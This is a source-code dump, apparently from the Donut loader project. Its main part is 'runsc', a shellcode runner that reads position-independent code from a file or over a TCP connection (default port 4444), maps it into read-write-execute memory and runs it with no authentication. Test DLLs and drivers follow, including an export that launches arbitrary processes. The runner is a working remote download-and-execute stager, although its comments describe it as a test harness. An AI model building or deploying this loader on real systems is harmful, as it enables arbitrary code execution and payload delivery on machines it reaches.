23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) | |
25 | HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, | |
26 | STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN | |
27 | ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE | |
28 | POSSIBILITY OF SUCH DAMAGE. */ | |
29 | ||
30 | #if defined(_WIN32) || defined(_WIN64) | |
31 | #ifndef _WIN32_WINNT | |
32 | #define _WIN32_WINNT 0x0502 | |
33 | #endif | |
34 | #define WIN | |
35 | #ifndef _WINSOCKAPI_ | |
36 | #define _WINSOCKAPI_ | |
37 | #endif | |
38 | #include <windows.h> | |
39 | #include <shlwapi.h> | |
40 | #include <winsock2.h> | |
41 | #include <ws2tcpip.h> | |
42 | #define close closesocket | |
43 | #define SHUT_RDWR SD_BOTH | |
44 | #pragma comment(lib, "ws2_32.lib") | |
45 | #pragma comment(lib, "shlwapi.lib") | |
46 | #else | |
47 | #include <unistd.h> | |
48 | #include <sys/socket.h> | |
49 | #include <sys/types.h> | |
50 | #include <sys/mman.h> | |
51 | #include <arpa/inet.h> | |
52 | #include <netdb.h> | |
53 | #include <netinet/in.h> | |
54 | #include <sys/ioctl.h> | |
55 | #include <net/if.h> | |
56 | #include <signal.h> | |
57 | #include <fcntl.h> | |
58 | #endif | |
59 | ||
60 | #include <stdio.h> | |
61 | #include <stdint.h> | |
62 | #include <string.h> | |
63 | #include <stdlib.h> | |
64 | #include <time.h> | |
65 | #include <sys/stat.h> | |
66 | ||
67 | #define RSC_CLIENT 0 | |
68 | #define RSC_SERVER 1 | |
69 | #define RSC_EXEC 2 | |
70 | ||
71 | #define RSC_SEND 0 | |
72 | #define RSC_RECV 1 | |
73 | ||
74 | #define DEFAULT_PORT "4444" | |
75 | ||
76 | // structure for parameters | |
// structure for parameters (one instance, filled by parse_args() in main)
typedef struct _args_t {
    int s, r;                       // not read anywhere in this file
    char *port, *address, *file;    // -p value, positional host, -f value (point into argv / DEFAULT_PORT)
#ifdef WIN
    char *modules;                  // -m value: ',' or ';' separated DLL names for load_modules()
#endif
    int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;   // mode/tx_mode use the RSC_* values
    struct sockaddr *ai_addr;       // points at v4 or v6 below, whichever ai_family selects
    struct sockaddr_in v4;
    struct sockaddr_in6 v6;
    char ip[INET6_ADDRSTRLEN];      // textual form of ai_addr, written by addr2ip()
    uint32_t code_len;              // bytes held in code; 0 means nothing to run or free
    void *code;                     // heap buffer (malloc/realloc) holding the PIC; freed by main()
} args_t;
91 | ||
92 | #ifdef WIN | |
93 | /**F*****************************************************************/ | |
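void xstrerror (char *fmt, ...)
/**
 * PURPOSE : Print a caller-supplied message followed by the text of the
 *           last Win32 error (GetLastError) on stdout.
 *
 * PARAMS  : fmt, ... - printf-style message. Only literal formats from
 *           this file are passed; never hand untrusted text in as fmt.
 *
 * RETURN  : Nothing
 *
 * NOTES   : GetLastError() is captured before any formatting call so the
 *           formatting cannot clobber it.
 *
 *F*/
{
    char    *error = NULL;
    va_list  arglist;
    char     buffer[2048];
    DWORD    dwError = GetLastError();

    va_start (arglist, fmt);
    wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
    va_end (arglist);
    // be safe regardless of what wvnsprintf does on truncation
    buffer[sizeof(buffer) - 1] = 0;

    // FORMAT_MESSAGE_IGNORE_INSERTS: system messages may contain %1-style
    // insert sequences; with a NULL Arguments array and without this flag
    // FormatMessage's behaviour on such a message is undefined.
    if (FormatMessage (
        FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM |
        FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
        (LPSTR)&error, 0, NULL))
    {
        printf ("[ %s : %s\n", buffer, error);
        LocalFree (error);
    } else {
        // DWORD is unsigned long; %i would misprint large codes
        printf ("[ %s : %lu\n", buffer, (unsigned long)dwError);
    }
}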
124 | #else | |
125 | #define xstrerror printf | |
126 | #endif | |
127 | ||
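char *addr2ip(args_t *p)
/**
 * PURPOSE : Render the address in p->ai_addr as text into p->ip.
 *
 * RETURN  : p->ip, always NUL-terminated; the empty string if the
 *           conversion failed.
 *
 * NOTES   : Callers print the result as "connecting to %s" / "accepting
 *           connection from %s". On failure the buffer is cleared rather
 *           than left holding the previous call's text, so a stale address
 *           is never attributed to a new peer.
 *
 *F*/
{
#ifdef WIN
    DWORD ip_size = sizeof(p->ip);
    if (WSAAddressToString (p->ai_addr, p->ai_addrlen,
        NULL, (char*)p->ip, &ip_size) != 0) {
        p->ip[0] = 0;
    }
#else
    // ai_addr aliases one of these two members, chosen by ai_family
    const void *src = (p->ai_family == AF_INET)
                    ? (const void*)&p->v4.sin_addr
                    : (const void*)&p->v6.sin6_addr;
    if (inet_ntop(p->ai_family, src, p->ip, sizeof(p->ip)) == NULL) {
        p->ip[0] = 0;
    }
#endif
    return p->ip;
}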
145 | ||
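int init_network (args_t *p)
/**
 * PURPOSE : initialize winsock for windows, resolve network address
 *
 * RETURN  : length of the sockaddr now referenced by p->ai_addr
 *           (non-zero means success), 0 on failure
 *
 * NOTES   : With no address the wildcard address of p->ai_family is used
 *           (listen on all interfaces). Otherwise the first getaddrinfo()
 *           result of the right family that fits the destination structure
 *           is copied into p->v4 / p->v6.
 *
 *F*/
{
    struct addrinfo *list = NULL, *e = NULL;
    struct addrinfo  hints;
    int              t;
#ifdef WIN
    WSADATA          wsa;
    int              rc;
#endif

    // zero length is the failure result
    p->ai_addrlen = 0;

#ifdef WIN
    rc = WSAStartup (MAKEWORD (2, 0), &wsa);
    if (rc != 0) {
        // WSAStartup returns the error code directly; GetLastError is not set
        printf ("[ WSAStartup failed: %d\n", rc);
        return 0;
    }
#endif

    if (p->address == NULL)
    {
        // no address supplied: bind the wildcard address of the selected family
        if (p->ai_family == AF_INET) {
            memset (&p->v4, 0, sizeof(p->v4));
            p->v4.sin_family      = AF_INET;
            p->v4.sin_port        = htons((u_short)p->port_nbr);
            p->v4.sin_addr.s_addr = INADDR_ANY;
            p->ai_addr    = (struct sockaddr*)&p->v4;
            p->ai_addrlen = sizeof (struct sockaddr_in);
        } else {
            // anything else is treated as ipv6
            memset (&p->v6, 0, sizeof(p->v6));
            p->v6.sin6_family = AF_INET6;
            p->v6.sin6_port   = htons((u_short)p->port_nbr);
            p->v6.sin6_addr   = in6addr_any;
            p->ai_addr    = (struct sockaddr*)&p->v6;
            p->ai_addrlen = sizeof (struct sockaddr_in6);
        }
        return p->ai_addrlen;
    }

    memset (&hints, 0, sizeof (hints));
    hints.ai_flags    = AI_PASSIVE;
    hints.ai_family   = p->ai_family;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;

    // get all network addresses
    t = getaddrinfo (p->address, p->port, &hints, &list);
    if (t != 0) {
        printf ("[ getaddrinfo(%s): %s\n", p->address, gai_strerror(t));
        return 0;
    }

    // take the first result that matches the requested family and fits
    // the destination structure (the copy is bounded by its size, so a
    // surprising result cannot overrun v4/v6)
    for (e = list; e != NULL; e = e->ai_next)
    {
        if (e->ai_addr == NULL || e->ai_family != p->ai_family) continue;
        if (p->ai_family == AF_INET) {
            if (e->ai_addrlen > sizeof(p->v4)) continue;
            memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
            p->ai_addr = (struct sockaddr*)&p->v4;
        } else {
            if (e->ai_addrlen > sizeof(p->v6)) continue;
            memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
            p->ai_addr = (struct sockaddr*)&p->v6;
        }
        p->ai_addrlen = (int)e->ai_addrlen;
        break;
    }
    freeaddrinfo (list);

    return p->ai_addrlen;
}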
222 | ||
// Hook for attaching a debugger before the PIC runs. Intentionally a
// no-op: the -d switch handled in xcode() is what actually breaks in.
void debug(void *bin)
{
    (void)bin;
}
229 | ||
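// allocate read/write and executable memory
// copy data from p->code and execute
void xcode(args_t *p)
/**
 * PURPOSE : Copy p->code into a fresh RWX mapping and call it as a
 *           function taking no arguments.
 *
 * RETURN  : Nothing. Control only comes back if the PIC returns.
 *
 * NOTES   : This deliberately executes whatever bytes were read from a
 *           file (-x) or received from the socket (no authentication or
 *           integrity check of any kind) - it is a test harness and must
 *           never be reachable from an untrusted network. The mapping is
 *           left writable while executing because the code under test may
 *           patch itself in place; a W^X variant (write, then
 *           mprotect/VirtualProtect to RX) would be stricter but is not
 *           guaranteed to work with every payload tested here.
 *
 *F*/
{
    void *bin;
#ifndef WIN
    int   fd[2048];
    int   i, nfd = 0;
#endif

    if (p->code_len == 0) {
        printf("[ no code to execute.\n");
        return;
    }
    printf ("[ executing code...");

#ifdef WIN
    bin = VirtualAlloc (0, p->code_len,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (bin == NULL) {
        xstrerror ("VirtualAlloc");
        return;
    }
#else
    bin = mmap (0, p->code_len,
        PROT_EXEC | PROT_WRITE | PROT_READ,
        MAP_ANON | MAP_PRIVATE, -1, 0);
    // mmap reports failure as MAP_FAILED ((void*)-1), never NULL; a NULL
    // test would let a failed mapping fall straight into memcpy.
    if (bin == MAP_FAILED) {
        perror ("mmap");
        return;
    }
#endif
    memcpy (bin, p->code, p->code_len);

    // create file/socket descriptors to simulate real system
    // created interesting results on openbsd with limits
    // to how many files could be open at once..
    // (the count is clamped to the fd[] array; a failed socket() ends the
    // loop and only descriptors actually opened are closed later)
    if (p->sim > 0) {
#ifndef WIN
        int want = (int)(sizeof(fd) / sizeof(fd[0]));
        if (p->sim < want) want = p->sim;
        for (i = 0; i < want; i++) {
            int s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
            if (s < 0) break;
            fd[nfd++] = s;
        }
#else
        // todo: no Windows equivalent implemented
#endif
    }

    // debug the code?
    if (p->dbg) {
#ifdef WIN
        DebugBreak();
#else
        raise(SIGTRAP);
#endif
    }
    // execute
    ((void(*)(void))bin)();
    printf("OK!\n");

#ifndef WIN
    // close all descriptors
    for (i = 0; i < nfd; i++) {
        close(fd[i]);
    }
#endif
#ifdef WIN
    // MEM_RELEASE must not be combined with MEM_DECOMMIT (the call fails
    // with ERROR_INVALID_PARAMETER and the region leaks)
    VirtualFree (bin, 0, MEM_RELEASE);
#else
    munmap (bin, p->code_len);
#endif
}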
299 | ||
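// Stream the file named by p->file to socket s. p->code_len is advanced by
// the number of bytes send() actually accepted, which main() reports.
void send_data(args_t *p, int s) {
    FILE    *fd;
    size_t   outlen, sum;
    int      len;
    uint8_t  buf[BUFSIZ];

    // open file for read in binary mode
    printf ("[ opening %s for read\n", p->file);
    fd = fopen(p->file, "rb");
    if (fd == NULL) {
        xstrerror ("fopen(\"%s\")", p->file);
        return;
    }

    // send contents of file
    printf ("[ sending data\n");
    for (;;) {
        // read block; zero means EOF (or a read error)
        outlen = fread(buf, sizeof(uint8_t), sizeof(buf), fd);
        if (outlen == 0) break;
        // send() may take less than offered; loop until the block is out
        for (sum = 0; sum < outlen; sum += (size_t)len) {
            len = send (s, (const char*)&buf[sum], (int)(outlen - sum), 0);
            if (len <= 0) break;
        }
        p->code_len += (uint32_t)sum;
        if (outlen != sum) break;   // short send: the peer went away
    }
    // code_len is uint32_t; %i would be the wrong conversion for it
    printf ("[ sent %u bytes\n", (unsigned)p->code_len);
    fclose(fd);
}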
331 | ||
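// Receive everything the peer sends on s - until it disconnects or stays
// silent for 5 s - into a growing heap buffer at p->code / p->code_len.
// SECURITY: whatever arrives here is executed verbatim by xcode(); there is
// no authentication, integrity check or size limit. Only run this listener
// on a network you control.
void recv_data(args_t *p, int s) {
    int            r;
    fd_set         fds;
    struct timeval tv;
    void          *pv;

    p->code_len = 0;
    p->code     = malloc(BUFSIZ);
    if (p->code == NULL) {
        printf("[ error: out of memory.\n");
        return;
    }

#ifndef WIN
    // select() cannot track descriptors >= FD_SETSIZE; FD_SET on such a
    // value writes outside the fd_set
    if (s < 0 || s >= FD_SETSIZE) {
        printf("[ error: descriptor %d out of range for select().\n", s);
        free(p->code);
        p->code = NULL;
        return;
    }
#endif

    // set to non-blocking mode
#ifdef WIN
    {
        u_long nb = 1;
        ioctlsocket (s, FIONBIO, &nb);
    }
#else
    {
        int fl = fcntl(s, F_GETFL, 0);
        if (fl != -1) fcntl(s, F_SETFL, fl | O_NONBLOCK);
    }
#endif
    // keep reading until remote disconnects or we run out of memory
    printf ("[ receiving data\n");

    for (;;) {
        FD_ZERO(&fds);
        FD_SET(s, &fds);

        tv.tv_sec  = 5;
        tv.tv_usec = 0;
        // nfds is ignored by Winsock; POSIX wants highest descriptor + 1
        r = select(s + 1, &fds, 0, 0, &tv);
        if (r <= 0) {
            printf ("[ waiting for data timed out or failed\n");
            break;
        }
        // receive a block; the buffer always has BUFSIZ free bytes at the end
        r = recv(s, (char*)p->code + p->code_len, BUFSIZ, 0);
        if (r <= 0) break;          // 0 = orderly shutdown, <0 = error
        p->code_len += (uint32_t)r;
        // resize buffer for the next read; keep the old block if realloc fails
        pv = realloc(p->code, p->code_len + BUFSIZ);
        if (pv == NULL) {
            p->code_len = 0;
            free(p->code);
            p->code = NULL;
            printf("[ error: out of memory.\n");
            break;
        }
        p->code = pv;
    }
    if (p->code_len != 0) {
        printf ("[ received %u bytes\n", (unsigned)p->code_len);
    } else if (p->code != NULL) {
        // nothing arrived: main() only frees when code_len != 0
        free(p->code);
        p->code = NULL;
    }
}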
384 | ||
385 | // | |
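int ssr (args_t *p)
/**
 * PURPOSE : Listen on p->ai_addr, accept one client and either send
 *           p->file to it (RSC_SEND) or receive and execute what it sends
 *           (RSC_RECV -> recv_data + xcode).
 *
 * RETURN  : 0 or length of shellcode sent/received
 *
 * NOTES   : SO_REUSEADDR is set so a quick restart after the previous
 *           run's TIME_WAIT does not fail. On Windows that option also
 *           lets another local process bind the same port and race for
 *           the connection (SO_EXCLUSIVEADDRUSE prevents that) - keep in
 *           mind that the bytes this listener receives get executed.
 *
 *F*/
{
    int       s, c, r, t;
    socklen_t alen;

    p->code_len = 0;

    // create socket
    printf ("[ creating socket\n");
    s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf ("[ unable to create socket\n");
        return 0;
    }

    // ensure we can reuse socket
    t = 1;
    setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));

    // bind to port
    printf ("[ binding to port %s\n", p->port);
    r = bind(s, p->ai_addr, p->ai_addrlen);
    if (r != 0) {
        perror("bind");
    } else if (listen (s, 1) != 0) {
        perror("listen");
    } else {
        printf ("[ waiting for connections on %s\n", addr2ip(p));
        // accept() overwrites the sockaddr behind p->ai_addr with the
        // peer's address, which is what addr2ip() reports from here on
        alen = (socklen_t)p->ai_addrlen;
        c = accept(s, p->ai_addr, &alen);
        if (c < 0) {
            perror("accept");
        } else {
            p->ai_addrlen = (int)alen;
            printf ("[ accepting connection from %s\n", addr2ip(p));
            if (p->tx_mode == RSC_SEND) {
                send_data(p, c);
            } else {
                recv_data(p, c);
                xcode(p);
            }
            // close socket to peer
            shutdown(c, SHUT_RDWR);
            close(c);
        }
    }
    // close listening socket
    shutdown(s, SHUT_RDWR);
    close(s);

    return p->code_len;
}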
446 | ||
447 | /**F*****************************************************************/ | |
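int csr (args_t *p)
/**
 * PURPOSE : opens connection to remote system and sends shellcode
 *           (RSC_SEND) or receives and executes one (RSC_RECV)
 *
 * RETURN  : 1 if the connection was established, 0 otherwise
 *
 * NOTES   : None
 *
 *F*/
{
    int s, r, ok = 0;

    printf ("[ creating socket\n");
    s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) return 0;

    // try connect to remote
    printf ("[ connecting to %s\n", addr2ip(p));
    r = connect(s, p->ai_addr, p->ai_addrlen);

    if (r == 0) {
        ok = 1;
        if (p->tx_mode == RSC_SEND) {
            send_data(p, s);
        } else {
            recv_data(p, s);
            xcode(p);
        }
    } else {
        xstrerror("connect");
    }
    printf ("[ closing connection\n");
    shutdown(s, SHUT_RDWR);
    close(s);
    // a failed connect() used to report success here
    return ok;
}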
485 | ||
486 | /**F*****************************************************************/ | |
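void xfile(args_t *p)
/**
 * PURPOSE : read contents of shellcode and attempt to execute it locally
 *
 * RETURN  : Nothing. On success p->code / p->code_len hold the file
 *           contents (the caller frees them); on any failure both are
 *           reset so nothing is executed and nothing leaks.
 *
 * NOTES   : None
 *
 *F*/
{
    FILE   *fd;
    size_t  len;
    void   *pv;

    p->code_len = 0;
    p->code     = NULL;

    printf ("[ reading code from %s\n", p->file);
    fd = fopen(p->file, "rb");
    if (fd == NULL) {
        xstrerror("fopen(\"%s\")", p->file);
        return;
    }

    // initial block; every iteration below keeps BUFSIZ free bytes at the end
    p->code = malloc(BUFSIZ);
    if (p->code == NULL) {
        printf("[ error: out of memory!.\n");
        fclose(fd);
        return;
    }

    // read contents of file
    for (;;) {
        len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
        if (len == 0) break;             // EOF or read error
        p->code_len += (uint32_t)len;
        // resize buffer for next read; keep the old block if realloc fails
        pv = realloc(p->code, p->code_len + BUFSIZ);
        if (pv == NULL) {
            p->code_len = 0;
            free(p->code);
            p->code = NULL;
            printf("[ error: out of memory!.\n");
            break;
        }
        p->code = pv;
    }
    fclose(fd);

    if (p->code_len != 0) {
        xcode(p);
    } else {
        // empty file: main() only frees when code_len != 0
        free(p->code);
        p->code = NULL;
    }
}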
539 | ||
540 | #ifdef WIN | |
// Preload every DLL named in `names` (',' or ';' separated; the string is
// modified in place by strtok) so the shellcode under test finds them
// already mapped. Names go to LoadLibrary as given, so a bare name is
// resolved through the normal DLL search order - pass full paths for
// anything that is not a system DLL.
void load_modules(char *names) {
    const char *seps = ";,";
    char       *name;

    for (name = strtok(names, seps); name != NULL; name = strtok(NULL, seps)) {
        HMODULE h = LoadLibrary(name);
        printf ("[ loading %s...%s\n", name, h == NULL ? "FAILED" : "OK");
    }
}
554 | #endif | |
555 | ||
556 | /**F*****************************************************************/ | |
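// Print command-line help, wait for a key press and exit(0).
// Every switch parse_args() understands is listed here (the -d debug
// switch was previously undocumented).
void usage (void) {
    printf ("\n usage: runsc <address> [options]\n");
    printf ("\n -4 Use IP version 4 (default)");
    printf ("\n -6 Use IP version 6");
    printf ("\n -l Listen mode (required when listening on specific interface)");
#ifdef WIN
    printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
#endif
    printf ("\n -f <file> Read PIC from <file>");
    printf ("\n -s <count> Simulate real process by creating file descriptors");
    printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
    printf ("\n -x Execute PIC (requires -f)");
    printf ("\n -d Break into the debugger right before the PIC is called");
    printf ("\n\n Press any key to continue . . .");
    getchar ();

    exit (0);
}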
574 | ||
575 | /**F*****************************************************************/ | |
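// Fetch the value for the switch at argv[*i]: either the text glued to the
// switch ("-fFILE") or the next argument ("-f FILE", advancing *i so the
// caller's loop skips it). A missing value is a usage error: it is reported
// and the process exits with status 1 so a script driving runsc does not
// mistake it for success.
char* getparam (int argc, char *argv[], int *i) {
    int n = *i;

    if (argv[n][2] != 0) {
        return &argv[n][2];
    }
    if ((n + 1) < argc) {
        *i = n + 1;
        return argv[n + 1];
    }
    printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
    exit (1);
}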
588 | ||
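// Walk argv and fill p. A switch starts with '-' or '/'; anything else is
// taken as the host to connect to (client mode). Unknown switches and bad
// port numbers end in usage(), which exits.
void parse_args (args_t *p, int argc, char *argv[]) {
    int  i;
    char opt;

    // for each argument
    for (i = 1; i < argc; i++)
    {
        // both prefixes are tested on argv[i][0]; checking [0] before [1]
        // also keeps an empty argument from being read past its terminator
        if (argv[i][0] == '-' || argv[i][0] == '/')
        {
            // get option value (NUL for a bare "-", which hits default below)
            opt = argv[i][1];
            switch (opt)
            {
                case '4':
                    p->ai_family = AF_INET;
                    break;
                case '6': // use ipv6 (default is ipv4)
                    p->ai_family = AF_INET6;
                    break;
                case 'x': // execute PIC, requires -f
                    p->mode = RSC_EXEC;
                    break;
                case 'd': // debug the code
                    p->dbg = 1;
                    break;
                case 'f': // file
                    p->file = getparam(argc, argv, &i);
                    break;
                case 'l': // listen for incoming connections
                    p->mode = RSC_SERVER;
                    break;
#ifdef WIN
                case 'm': // windows only, loads modules required by shellcode
                    p->modules = getparam(argc, argv, &i);
                    break;
#endif
                case 's': // create file descriptors before execution
                    p->sim = atoi(getparam(argc, argv, &i));
                    break;
                case 'p': // port number
                    p->port     = getparam(argc, argv, &i);
                    p->port_nbr = atoi(p->port);
                    // htons((u_short)port_nbr) would silently wrap anything
                    // outside 1..65535 (and atoi turns junk into 0), so
                    // reject it here instead
                    if (p->port_nbr < 1 || p->port_nbr > 65535) {
                        printf ("[ invalid port number %s\n", p->port);
                        usage();
                    }
                    break;
                case '?': // display usage
                case 'h':
                    usage ();
                    break;
                default:
                    printf ("[ unknown option %c\n", opt);
                    usage();
                    break;
            }
        } else {
            // assume it's hostname or ip
            p->address = argv[i];
            p->mode    = RSC_CLIENT;
        }
    }
}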
649 | ||
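int main (int argc, char *argv[]) {
    args_t      args;
    struct stat st;

#ifdef WIN
    WSADATA wsa;

    // Keep ws2_32 / advapi32 mapped in this process, presumably so PIC that
    // expects them to be loaded already can find them. Both are normally
    // KnownDLLs, so the bare names are not exposed to search-order hijacking.
    LoadLibrary("ws2_32");
    LoadLibrary("advapi32");

    // init_network() calls WSAStartup again; the library reference-counts
    // it, so the double initialisation is harmless
    WSAStartup(MAKEWORD(2,0), &wsa);
#endif

    // unbuffered output so progress lines appear even if the PIC never returns
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    memset (&args, 0, sizeof(args));

    // set default parameters
    args.address   = NULL;
    args.file      = NULL;
    args.ai_family = AF_INET;
    args.port      = DEFAULT_PORT;
    args.port_nbr  = atoi(args.port);
    args.mode      = -1;
    args.tx_mode   = -1;
    args.sim       = 0;
    args.dbg       = 0;

    printf ("\n[ run shellcode v0.2\n");

    parse_args(&args, argc, argv);

    // check if we have file parameter and it accessible
    if (args.file != NULL) {
        if (stat (args.file, &st)) {
            printf ("[ unable to access %s\n", args.file);
            return 0;
        }
    }

#ifdef WIN
    if (args.modules != NULL) {
        load_modules(args.modules);
    }
#endif
    if (args.mode == RSC_EXEC) {
        // local execution of a file
        if (args.file == NULL) {
            printf ("\n[ you've used -x without supplying file with -f");
            return 0;
        }
        xfile(&args);
    } else if (init_network(&args)) {
        // with a file we send it, without one we receive and execute
        args.tx_mode = (args.file == NULL) ? RSC_RECV : RSC_SEND;

        // no explicit mode: listen for incoming connections
        if (args.mode == -1) {
            args.mode = RSC_SERVER;
        }

        if (args.mode == RSC_SERVER) {
            ssr (&args);
        } else {
            csr (&args);
        }
    }
    // the buffer comes from xfile()/recv_data(); free it on every path,
    // including the -x one, which used to return before reaching here
    if (args.code_len != 0) {
        free(args.code);
    }
    return 0;
}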
0 | ||
1 | #define UNICODE | |
2 | #include <windows.h> | |
3 | ||
4 | #include "donut.h" | |
5 | #pragma comment(lib, "user32.lib") | |
6 | ||
7 | void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]); | |
8 | typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR); | |
9 | ||
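// Test driver: shows the four parameters it is about to pass, loads the
// test DLL and hands its DonutApiW export to call_api() with them, so the
// second message box (from the DLL) can be compared with the first.
int main(void) {
    HMODULE    m;
    _DonutApiW DonutApiW;
    WCHAR      param[4][DONUT_MAX_NAME] = {L"arg0", L"arg1", L"arg2", L"arg3"};
    WCHAR      msg[4096];

    // size - 1 plus an explicit terminator: _snwprintf leaves the buffer
    // unterminated when the output is truncated. %ls is the portable
    // spelling of a wide-string conversion.
    _snwprintf(msg, ARRAYSIZE(msg) - 1,
        L"param[0] : %ls\r"
        L"param[1] : %ls\r"
        L"param[2] : %ls\r"
        L"param[3] : %ls\r",
        param[0], param[1], param[2], param[3]);
    msg[ARRAYSIZE(msg) - 1] = 0;

    MessageBox(NULL, msg, L"Donut Test", MB_OK);

    // A bare DLL name is resolved through the normal DLL search order
    // (application directory first); acceptable for a test harness only.
    m = LoadLibrary(L"call_api_dll.dll");
    if (m == NULL) {
        return 1;   // nothing to test; report failure instead of pretending
    }

    DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
    if (DonutApiW != NULL) {
        call_api((FARPROC)DonutApiW, 4, param);
    }
    FreeLibrary(m);
    return 0;
}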
36 |
0 | #define WIN32_LEAN_AND_MEAN | |
1 | #define UNICODE | |
2 | ||
3 | #include <windows.h> | |
4 | #include "donut.h" | |
5 | ||
6 | #pragma comment(lib, "user32.lib") | |
7 | ||
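// Exported test entry point: shows the four wide-string arguments it was
// called with so a caller (e.g. the donut loader) can verify parameter
// passing. NULL arguments are shown as "(null)" instead of dereferenced.
__declspec(dllexport)
VOID APIENTRY DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
    WCHAR msg[4096];

    // size - 1 plus an explicit terminator: _snwprintf leaves the buffer
    // unterminated when the output is truncated. %ls (C99 wide string)
    // replaces %s, whose meaning in a wide printf differs between CRTs.
    _snwprintf(msg, ARRAYSIZE(msg) - 1,
        L"param[0] : %ls\r"
        L"param[1] : %ls\r"
        L"param[2] : %ls\r"
        L"param[3] : %ls\r",
        arg0 ? arg0 : L"(null)",
        arg1 ? arg1 : L"(null)",
        arg2 ? arg2 : L"(null)",
        arg3 ? arg3 : L"(null)");
    msg[ARRAYSIZE(msg) - 1] = 0;

    MessageBox(NULL, msg, L"Donut Test", MB_OK);
}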
21 | ||
// Minimal DllMain: nothing happens on attach or detach, the DLL only exists
// to export DonutApiW. Always reports success to the loader.
__declspec(dllexport)
BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved) {
    (void)hModule;
    (void)ul_reason_for_call;
    (void)lpReserved;
    return TRUE;
}
0 | #define UNICODE | |
1 | ||
2 | #include <stdint.h> | |
3 | #include <stdio.h> | |
4 | #include <stdlib.h> | |
5 | #include <string.h> | |
6 | #include <sys/stat.h> | |
7 | #include <inttypes.h> | |
8 | ||
9 | #include <windows.h> | |
10 | #pragma comment(lib, "user32.lib") | |
11 | #pragma comment(lib, "shell32.lib") | |
12 | ||
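// Start two child processes from the given command lines, one after the
// other, without waiting for either. Each command line must be writable
// (CreateProcessW may modify it in place) and should quote the executable
// path if it contains spaces, otherwise CreateProcess tries each
// whitespace-delimited prefix as the program. Failures are ignored (this is
// a test export); the handles of children that did start are closed so
// the DLL does not leak them.
__declspec(dllexport)
VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
    PWCHAR cmds[2] = { proc1, proc2 };
    int    n;

    for (n = 0; n < 2; n++) {
        PROCESS_INFORMATION pi;
        STARTUPINFO         si;

        if (cmds[n] == NULL) continue;

        ZeroMemory(&si, sizeof(si));
        ZeroMemory(&pi, sizeof(pi));
        si.cb = sizeof(si);
        if (CreateProcess(NULL, cmds[n], NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
            // we neither wait for nor signal the child; drop our references
            CloseHandle(pi.hThread);
            CloseHandle(pi.hProcess);
        }
    }
}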
26 | ||
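// Exported test entry point: shows the four wide-string arguments it was
// called with so a caller (e.g. the donut loader) can verify parameter
// passing. NULL arguments are shown as "(null)" instead of dereferenced.
__declspec(dllexport)
VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
    WCHAR msg[4096];

    // size - 1 plus an explicit terminator: _snwprintf leaves the buffer
    // unterminated when the output is truncated. %ls is the portable
    // spelling of the MSVC-only %ws.
    _snwprintf(msg, ARRAYSIZE(msg) - 1,
        L"param[0] : %ls\r"
        L"param[1] : %ls\r"
        L"param[2] : %ls\r"
        L"param[3] : %ls\r",
        arg0 ? arg0 : L"(null)",
        arg1 ? arg1 : L"(null)",
        arg2 ? arg2 : L"(null)",
        arg3 ? arg3 : L"(null)");
    msg[ARRAYSIZE(msg) - 1] = 0;

    MessageBox(NULL, msg, L"Donut Test", MB_OK);
}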
40 | ||
// Test DllMain: pops a message box once, on process attach, so an injection
// test can see the DLL was mapped. NOTE(review): calling user32 from
// DllMain runs under the loader lock and is documented as unsafe (deadlock
// risk); tolerable in a throwaway test DLL, never in production code.
__declspec(dllexport)
BOOL WINAPI DllMain(HMODULE hModule,
                    DWORD ul_reason_for_call,
                    LPVOID lpReserved) {
    (void)hModule;
    (void)lpReserved;

    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
    }
    return TRUE;
}
0 | // A Hello World! program in C#. | |
1 | using System; | |
namespace HelloWorld
{
    /// <summary>
    /// The classic hello-world console program; presumably kept here as a
    /// small managed test input for the loader.
    /// </summary>
    class Hello
    {
        static void Main()
        {
            Console.Out.WriteLine("Hello World!");

            // Block until a key is pressed so the console window stays
            // visible when started outside a terminal (debug mode).
            Console.Out.WriteLine("Press any key to exit.");
            Console.ReadKey();
        }
    }
}
0 | ||
1 | // code to implement hooking ProcessExit from unmanaged code | |
2 | // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8 | |
3 | // | |
4 | #include <windows.h> | |
5 | #include <oleauto.h> | |
6 | #include <mscoree.h> | |
7 | #include <comdef.h> | |
